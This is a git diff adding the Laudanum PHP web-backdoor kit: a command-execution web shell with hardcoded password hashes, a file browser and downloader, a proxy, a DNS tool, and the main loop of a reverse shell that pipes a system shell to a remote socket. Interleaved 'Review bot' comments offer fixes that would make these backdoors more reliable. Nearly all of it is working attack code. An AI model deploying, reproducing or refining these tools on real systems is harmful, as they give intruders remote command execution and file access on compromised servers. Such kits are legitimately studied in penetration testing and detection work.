@@ -0,0 +1,161 @@ + +*** +*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides access to DNS on the system. +*** Written by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +// ***************** Config entries below *********************** + +// IPs are enterable as individual addresses TODO: add CIDR support +$allowedIPs = array("19.168.2.16", "192.168.1.100"); + +# *********** No editable content below this line ************** + +$allowed = 0; +foreach ($allowedIPs as $IP) { + if ($_SERVER["REMOTE_ADDR"] == $IP) + $allowed = 1; +} + +if ($allowed == 0) { + header("HTTP/1.0 404 Not Found"); + die(); +} + + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. 
*/ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP DNS Access + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$query = isset($_POST['query']) ? $_POST['query'] : ''; +$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; +?> + + + + Laudanum PHP DNS Access + + + + + + +

DNS Query 0.1

+
+
+ DNS Lookup: +

Query: + Type: + +

+
+ + +"; + echo "Result = "; + print_r($result); + echo "Auth NS = "; + print_r($authns); + echo "Additional = "; + print_r($addtl); + echo ""; +} +?> +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php new file mode 100644 index 0000000..97bf627 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php 
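Review bot: The default allowlist in dns.php, `$allowedIPs = array("19.168.2.16", "192.168.1.100");`, has a first entry outside private address space; `19.168.2.16` is publicly routable and looks like a typo for `192.168.2.16`. An unedited deployment would therefore accept requests from an unrelated internet host. If the private address was intended, the line should read `$allowedIPs = array("192.168.2.16", "192.168.1.100");`. The inline `error_handler` also concatenates `$errstr` and `$errfile` into the HTML it emits with no escaping visible on this page; wrapping them in `htmlspecialchars()` would keep the error page from rendering message content as markup.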
@@ -0,0 +1,195 @@
+
+***
+*** Copyright 2012 by Kevin Johnson and the Laudanum Team
+***
+********************************************************************************
+***
+*** This file allows browsing of the file system.
+*** Written by Tim Medin
+***
+********************************************************************************
+*** This program is free software; you can redistribute it and/or
+*** modify it under the terms of the GNU General Public License
+*** as published by the Free Software Foundation; either version 2
+*** of the License, or (at your option) any later version.
+***
+*** This program is distributed in the hope that it will be useful,
+*** but WITHOUT ANY WARRANTY; without even the implied warranty of
+*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+*** GNU General Public License for more details.
+***
+*** You can get a copy of the GNU General Public License from this
+*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+*** You can also write to the Free Software Foundation, Inc., 59 Temple
+*** Place - Suite 330, Boston, MA 02111-1307, USA.
+***
+***************************************************************************** */
+
+// ***************** Config entries below ***********************
+
+// IPs are enterable as individual addresses TODO: add CIDR support
+$allowedIPs = array("192.168.1.1","127.0.0.1");
+
+# *********** No editable content below this line **************
+
+$allowed = 0;
+foreach ($allowedIPs as $IP) {
+ if ($_SERVER["REMOTE_ADDR"] == $IP)
+ $allowed = 1;
+}
+
+if ($allowed == 0) {
+ header("HTTP/1.0 404 Not Found");
+ die();
+}
+
+
+
+/* This error handler will turn all notices, warnings, and errors into fatal
+ * errors, unless they have been suppressed with the @-operator. */
+function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
+ /* The @-opertor (used with chdir() below) temporarely makes
+ * error_reporting() return zero, and we don't want to die in that case.
+ * We do note the error in the output, though. */
+ if (error_reporting() == 0) {
+ $_SESSION['output'] .= $errstr . "\n";
+ } else {
+ die('
+
+
+ Laudanum PHP File Browser
+
+
+

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+
+
+');
+ }
+}
+
+set_error_handler('error_handler');
+
+
+/* Initialize some variables we need again and again. */
+$dir = isset($_GET["dir"]) ? $_GET["dir"] : ".";
+$file = isset($_GET["file"]) ? $_GET["file"] : "";
+
+if ($file != "") {
+ if(file_exists($file)) {
+
+ $s = split("/", $file);
+ $filename = $s[count($s) - 1];
+ header("Content-type: application/x-download");
+ header("Content-Length: ".filesize($file));
+ header("Content-Disposition: attachment; filename=\"".$filename."\"");
+ readfile($file);
+ die();
+ }
+}
+?>
+
+
+
+ Laudanum File Browser
+
+
+
+
+
+
+

Laudanum File Browser 0.1

+Home
+ +Directory listing of / "; +$breadcrumb = '/'; +foreach ($dirs as $d) { + if ($d != '') { + $breadcrumb .= $d . "/"; + echo "$d/ "; + } +} +echo ""; + +// translate .. to a real dir +$parentdir = ""; +for ($i = 0; $i < count($dirs) - 2; $i++) { + $parentdir .= $dirs[$i] . "/"; +} + +echo ""; +echo ""; +echo ""; + +//get listing, separate into directories and files +$listingfiles = array(); +$listingdirs = array(); + +if ($handle = @opendir($curdir)) { + while ($o = readdir($handle)) { + if ($o == "." || $o == "..") continue; + if (@filetype($curdir . $o) == "dir") { + $listingdirs[] = $o . "/"; + } + else { + $listingfiles[] = $o; + } + } + + @natcasesort($listingdirs); + @natcasesort($listingfiles); + + //display directories + foreach ($listingdirs as $f) { + echo ""; + } + + //display files + foreach ($listingfiles as $f) { + echo ""; + } +} +else { + echo ""; +} +?> +
NameDateSize
../
" . $f . "" . "
" . $f . "" . "" . number_format(@filesize($curdir . $f)) . "

Can't open directory

+
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+
+
diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/php-reverse-shell.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/php-reverse-shell.php
new file mode 100644
index 0000000..921c059
--- /dev/null
+++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/php-reverse-shell.php
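Review bot: The download branch in file.php builds the attachment name with `split("/", $file)`, which was deprecated in PHP 5.3 and removed in PHP 7, and this file's own error handler turns every reported notice into a fatal page, so on those versions the branch is likely to die before any header is sent. `$filename = basename($file);` replaces both lines and also keeps path separators out of the `Content-Disposition` value. The directory listing further down echoes `$f` into the page; the markup is lost in this rendering, but if names are written without `htmlspecialchars()`, a crafted file name on the reviewed host would be rendered as HTML in the tester's browser.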
@@ -0,0 +1,192 @@
+ array("pipe", "r"), // stdin is a pipe that the child will read from
+ 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
+ 2 => array("pipe", "w") // stderr is a pipe that the child will write to
+);
+
+$process = proc_open($shell, $descriptorspec, $pipes);
+
+if (!is_resource($process)) {
+ printit("ERROR: Can't spawn shell");
+ exit(1);
+}
+
+// Set everything to non-blocking
+// Reason: Occsionally reads will block, even though stream_select tells us they won't
+stream_set_blocking($pipes[0], 0);
+stream_set_blocking($pipes[1], 0);
+stream_set_blocking($pipes[2], 0);
+stream_set_blocking($sock, 0);
+
+printit("Successfully opened reverse shell to $ip:$port");
+
+while (1) {
+ // Check for end of TCP connection
+ if (feof($sock)) {
+ printit("ERROR: Shell connection terminated");
+ break;
+ }
+
+ // Check for end of STDOUT
+ if (feof($pipes[1])) {
+ printit("ERROR: Shell process terminated");
+ break;
+ }
+
+ // Wait until a command is end down $sock, or some
+ // command output is available on STDOUT or STDERR
+ $read_a = array($sock, $pipes[1], $pipes[2]);
+ $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
+
+ // If we can read from the TCP socket, send
+ // data to process's STDIN
+ if (in_array($sock, $read_a)) {
+ if ($debug) printit("SOCK READ");
+ $input = fread($sock, $chunk_size);
+ if ($debug) printit("SOCK: $input");
+ fwrite($pipes[0], $input);
+ }
+
+ // If we can read from the process's STDOUT
+ // send data down tcp connection
+ if (in_array($pipes[1], $read_a)) {
+ if ($debug) printit("STDOUT READ");
+ $input = fread($pipes[1], $chunk_size);
+ if ($debug) printit("STDOUT: $input");
+ fwrite($sock, $input);
+ }
+
+ // If we can read from the process's STDERR
+ // send data down tcp connection
+ if (in_array($pipes[2], $read_a)) {
+ if ($debug) printit("STDERR READ");
+ $input = fread($pipes[2], $chunk_size);
+ if ($debug) printit("STDERR: $input");
+ fwrite($sock, $input);
+ }
+}
+
+fclose($sock);
+fclose($pipes[0]);
+fclose($pipes[1]);
+fclose($pipes[2]);
+proc_close($process);
+
+// Like print, but does nothing if we've daemonised ourself
+// (I can't figure out how to redirect STDOUT like a proper daemon)
+function printit ($string) {
+ if (!$daemon) {
+ print "$string\n";
+ }
+}
+
+?>
+
+
+
diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php
new file mode 100644
index 0000000..1176fcd
--- /dev/null
+++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php
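Review bot: The result of `stream_select()` is stored in `$num_changed_sockets` and never checked, so when the call fails and returns false the `while (1)` loop carries on with whatever is left in `$read_a` and, with every stream set non-blocking, may spin at full CPU on the host under test. Adding `if ($num_changed_sockets === false) break;` directly after the call lets the script fall through to the `fclose()`/`proc_close()` cleanup instead. The start of this file is missing from the page, so how `$sock` and `$chunk_size` are set up cannot be checked here.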
@@ -0,0 +1,351 @@
+
+***
+*** Copyright 2012 by Kevin Johnson and the Laudanum Team
+***
+********************************************************************************
+***
+*** This file allows browsing of the file system.
+*** Written by Tim Medin
+***
+********************************************************************************
+*** This program is free software; you can redistribute it and/or
+*** modify it under the terms of the GNU General Public License
+*** as published by the Free Software Foundation; either version 2
+*** of the License, or (at your option) any later version.
+***
+*** This program is distributed in the hope that it will be useful,
+*** but WITHOUT ANY WARRANTY; without even the implied warranty of
+*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+*** GNU General Public License for more details.
+***
+*** You can get a copy of the GNU General Public License from this
+*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+*** You can also write to the Free Software Foundation, Inc., 59 Temple
+*** Place - Suite 330, Boston, MA 02111-1307, USA.
+***
+***************************************************************************** */
+
+// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page
+// figure out how to reuse sessionid from the remote site
+
+// ***************** Config entries below ***********************
+
+// IPs are enterable as individual addresses TODO: add CIDR support
+$allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1");
+
+# *********** No editable content below this line **************
+
+$allowed = 0;
+foreach ($allowedIPs as $IP) {
+ if ($_SERVER["REMOTE_ADDR"] == $IP)
+ $allowed = 1;
+}
+
+if ($allowed == 0) {
+ header("HTTP/1.0 404 Not Found");
+ die();
+}
+
+/* This error handler will turn all notices, warnings, and errors into fatal
+ * errors, unless they have been suppressed with the @-operator.
*/
+function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
+ /* The @-opertor (used with chdir() below) temporarely makes
+ * error_reporting() return zero, and we don't want to die in that case.
+ * We do note the error in the output, though. */
+ if (error_reporting() == 0) {
+ $_SESSION['output'] .= $errstr . "\n";
+ } else {
+ die('
+
+
+ Laudanum PHP Proxy
+
+
+

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + +function geturlarray($u) { + // creates the url array, addes a scheme if it is missing and retries parsing + $o = parse_url($u); + if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } + if (!isset($o["path"])) { $o["path"] = "/"; } + return $o; +} + +function buildurl ($u) { + // build the url from the url array + // this is used because the built in function isn't + // avilable in all installs of php + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"]) ? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + $s .= isset($u["path"]) ? $u["path"] : "/"; + $s .= isset($u["query"]) ? "?" . $u["query"] : ""; + $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; + return $s; +} + +function buildurlpath ($u) { + //gets the full url and attempts to remove the file at the end of the url + // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"])? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + + $path = isset($u["path"]) ? $u["path"] : "/"; + // is the last portion of the path a file or a dir? + // assume if there is a . it is a file + // if it ends in a / then it is a dir + // if neither, than assume dir + $dirs = explode("/", $path); + $last = $dirs[count($dirs) - 1]; + if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { + // its a file, remove the last chunk + $path = substr($path, 0, -1 * strlen($last)); + } + + $s .= $path; + return $s; +} + +function getfilename ($u) { + // returns the file name + // e.g. 
http://blah.com/dir/file.ext returns file.ext + // technically, it is the last portion of the url, so there is a potential + // for a problem if a http://blah.com/dir returns a file + $s = explode("/", $u["path"]); + return $s[count($s) - 1]; +} + +function getcontenttype ($headers) { + // gets the content type + foreach($headers as $h) { + if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function getcontentencoding ($headers) { + foreach ($headers as $h) { + if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function removeheader($header, $headers) { + foreach (array_keys($headers) as $key) { + if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { + unset($headers[$key]); + return $headers; + } + } +} + +function rewritecookies($headers) { + // removes the path and domain from cookies + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { + $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); + $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); + } + } + return $headers; +} + +function getsessionid($headers) { + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) + return $out[1][0]; + } + return "0"; +} + +function compatible_gzinflate($gzData) { + if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { + $i = 10; + $flg = ord( substr($gzData, 3, 1) ); + if ( $flg > 0 ) { + if ( $flg & 4 ) { + list($xlen) = unpack('v', substr($gzData, $i, 2) ); + $i = $i + 2 + $xlen; + } + if ( $flg & 8 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 16 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 2 ) + $i = $i + 2; + } + return @gzinflate( substr($gzData, $i, -8) ); + } else { + return false; + } + return false; +} + +function rewrite ($d, $u) { + $r = $d; + //rewrite images and links - absolute 
reference + $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); + //rewrite images and links - hard linked + $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); + //rewrite images and links - relative reference + $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); + + + //rewrite form - absolute reference + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + //rewrite form - hard linked + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + //rewrite form - relative reference + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + return $r; +} + +/* Initialize some variables we need again and again. */ +$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; +if ($url == "") { + $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; +} + +if ($url == "") { +?> + + + + Laudanum PHP Proxy + + + + + + +

Laudanum PHP Proxy

+ +
+ + +
+
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+
+
+
+
diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php
new file mode 100644
index 0000000..a36848a
--- /dev/null
+++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php
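Review bot: `removeheader()` in proxy.php returns `$headers` only from inside the match branch, so when the named header is absent the function falls off the end and returns NULL, and a caller that assigns the result back would lose the whole header array. A `return $headers;` after the `foreach` fixes that. The `$header` argument is also concatenated into the pattern unescaped; `preg_quote($header, "/")` keeps a name containing regex metacharacters from changing the match. The call sites are not visible on this page, so the effect on the proxied response is inferred. Separately, the file header still reads "This file allows browsing of the file system", which appears to be copied from file.php.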
@@ -0,0 +1,409 @@
+
+*** Tim Medin
+***
+*** Copyright 2012 by Kevin Johnson and the Laudanum Team
+***
+********************************************************************************
+***
+*** This file provides shell access to the system. It is built based on the 2.1
+*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler
+***
+***
+*** Updated by Tim Medin
+***
+********************************************************************************
+*** This program is free software; you can redistribute it and/or
+*** modify it under the terms of the GNU General Public License
+*** as published by the Free Software Foundation; either version 2
+*** of the License, or (at your option) any later version.
+***
+*** This program is distributed in the hope that it will be useful,
+*** but WITHOUT ANY WARRANTY; without even the implied warranty of
+*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+*** GNU General Public License for more details.
+***
+*** You can get a copy of the GNU General Public License from this
+*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+*** You can also write to the Free Software Foundation, Inc., 59 Temple
+*** Place - Suite 330, Boston, MA 02111-1307, USA.
+***
+***************************************************************************** */
+
+// ***************** Config entries below ***********************
+
+// IPs are enterable as individual addresses TODO: add CIDR support
+$allowedIPs = array("192.168.1.55", "12.2.2.2");
+
+# format is "username" => "password"
+# password is generated using sha1sum as shown below (don't forget the -n, KEVIN!)
+# echo -n Password1 | sha1sum
+$users = array("kevin" => "b441ac06613fc8d63795be9ad0beaf55011936ac", "tim" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3", "yomamma" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3");
+
+# *********** No editable content below this line **************
+
+$allowed = 0;
+foreach ($allowedIPs as $IP) {
+ if ($_SERVER["REMOTE_ADDR"] == $IP)
+ $allowed = 1;
+}
+
+if ($allowed == 0) {
+ header("HTTP/1.0 404 Not Found");
+ die();
+}
+
+
+
+/* This error handler will turn all notices, warnings, and errors into fatal
+ * errors, unless they have been suppressed with the @-operator. */
+function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
+ /* The @-opertor (used with chdir() below) temporarely makes
+ * error_reporting() return zero, and we don't want to die in that case.
+ * We do note the error in the output, though. */
+ if (error_reporting() == 0) {
+ $_SESSION['output'] .= $errstr . "\n";
+ } else {
+ die('
+
+
+ Laudanum PHP Shell Access
+
+
+

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Get the latest version at laudanum.secureideas.net. +
+
+
+');
+ }
+}
+
+set_error_handler('error_handler');
+
+
+function logout() {
+ $_SESSION = array('authenticated' => false);
+ if (isset($_COOKIE[session_name()]))
+ setcookie(session_name(), '', time()-42000, '/');
+ session_destroy();
+}
+
+
+function stripslashes_deep($value) {
+ if (is_array($value))
+ return array_map('stripslashes_deep', $value);
+ else
+ return stripslashes($value);
+}
+
+if (get_magic_quotes_gpc())
+ $_POST = stripslashes_deep($_POST);
+
+/* Initialize some variables we need again and again. */
+$username = isset($_POST['username']) ? $_POST['username'] : '';
+$password = isset($_POST['password']) ? $_POST['password'] : '';
+$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';
+
+$command = isset($_POST['command']) ? $_POST['command'] : '';
+$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
+$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
+
+
+///* Default settings --- these settings should always be set to something. */
+//$default_settings = array('home-directory' => '.');
+
+///* Merge settings. */
+//$ini['settings'] = array_merge($default_settings, $ini['settings']);
+
+
+session_start();
+
+/* Delete the session data if the user requested a logout. This leaves the
+ * session cookie at the user, but this is not important since we
+ * authenticates on $_SESSION['authenticated']. */
+if (isset($_POST['logout']))
+ logout();
+
+///* Attempt authentication. */
+//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
+// isset($ini['users'][$username])) {
+// if (strchr($ini['users'][$username], ':') === false) {
+// // No seperator found, assume this is a password in clear text.
+// $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
+// } else {
+// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
+// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
+// }
+//}
+
+/* Attempt authentication.
*/
+if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))
+ $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password));
+
+/* Enforce default non-authenticated state if the above code didn't set it
+ * already. */
+if (!isset($_SESSION['authenticated']))
+ $_SESSION['authenticated'] = false;
+
+if ($_SESSION['authenticated']) {
+ /* Initialize the session variables. */
+ if (empty($_SESSION['cwd'])) {
+ $_SESSION['cwd'] = '.';
+ $_SESSION['history'] = array();
+ $_SESSION['output'] = '';
+ }
+
+ if (!empty($command)) {
+ /* Save the command for late use in the JavaScript. If the command is
+ * already in the history, then the old entry is removed before the
+ * new entry is put into the list at the front. */
+ if (($i = array_search($command, $_SESSION['history'])) !== false)
+ unset($_SESSION['history'][$i]);
+
+ array_unshift($_SESSION['history'], $command);
+
+ /* Now append the commmand to the output. */
+ $_SESSION['output'] .= '$ ' . $command . "\n";
+
+ /* Initialize the current working directory. */
+ if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {
+ $_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
+ } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) {
+ /* The current command is a 'cd' command which we have to handle
+ * as an internal shell command. */
+
+ if ($regs[1]{0} == '/') {
+ /* Absolute path, we use it unchanged. */
+ $new_dir = $regs[1];
+ } else {
+ /* Relative path, we append it to the current working
+ * directory. */
+ $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+ }
+
+ /* Transform '/./' into '/' */
+ while (strpos($new_dir, '/./') !== false)
+ $new_dir = str_replace('/./', '/', $new_dir);
+
+ /* Transform '//' into '/' */
+ while (strpos($new_dir, '//') !== false)
+ $new_dir = str_replace('//', '/', $new_dir);
+
+ /* Transform 'x/..'
into '' */
+ while (preg_match('|/\.\.(?!\.)|', $new_dir))
+ $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+
+ if ($new_dir == '') $new_dir = '/';
+
+ /* Try to change directory. */
+ if (@chdir($new_dir)) {
+ $_SESSION['cwd'] = $new_dir;
+ } else {
+ $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+ }
+
+ } elseif (trim($command) == 'exit') {
+ logout();
+ } else {
+
+ /* The command is not an internal command, so we execute it after
+ * changing the directory and save the output. */
+ chdir($_SESSION['cwd']);
+
+ // We canot use putenv() in safe mode.
+ if (!ini_get('safe_mode')) {
+ // Advice programs (ls for example) of the terminal size.
+ putenv('ROWS=' . $rows);
+ putenv('COLUMNS=' . $columns);
+ }
+
+ /* Alias expansion. */
+ $length = strcspn($command, " \t");
+ $token = substr($command, 0, $length);
+ if (isset($ini['aliases'][$token]))
+ $command = $ini['aliases'][$token] . substr($command, $length);
+
+ $io = array();
+ $p = proc_open($command,
+ array(1 => array('pipe', 'w'),
+ 2 => array('pipe', 'w')),
+ $io);
+
+ /* Read output sent to stdout. */
+ while (!feof($io[1])) {
+ $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+ ENT_COMPAT, 'UTF-8');
+ }
+ /* Read output sent to stderr. */
+ while (!feof($io[2])) {
+ $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+ ENT_COMPAT, 'UTF-8');
+ }
+
+ fclose($io[1]);
+ fclose($io[2]);
+ proc_close($p);
+ }
+ }
+
+ /* Build the command history for use in the JavaScript */
+ if (empty($_SESSION['history'])) {
+ $js_command_hist = '""';
+ } else {
+ $escaped = array_map('addslashes', $_SESSION['history']);
+ $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+ }
+}
+
+?>
+
+
+
+ Laudanum Shell
+
+
+
+
+
+
+
+

Laudanum Shell

+ +
+ + + +
+ Authentication + + Login failed, please try again:

' . "\n"; + else + echo "

Please login:

\n"; + ?> + +

Username:

+ +

Password:

+ +

+ + + +
+ + + +
+ Current Working Directory: + + +
+ +

+ $  +

+
+ +

+ Size: × + + + +

+ +
+ + + +
+ + +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Updated by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +
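Review bot: The login check `($users[$username] == hash("sha1", $password))` compares two hex digests with loose `==`, which PHP evaluates numerically when both strings look like numbers, so two different digests can compare equal; use `===` (or `hash_equals()` where the runtime provides it). The `$users` table committed here also ships ready-made unsalted SHA-1 entries, two of them identical, so any copy deployed without editing shares credentials that are public in this repository; an empty `$users = array();` with the format kept in the comment would fail closed. Further down, `realpath($ini['settings']['home-directory'])` and `$ini['aliases']` still refer to `$ini`, whose setup is commented out, so a bare `cd` would most likely end in the fatal error page instead of changing directory.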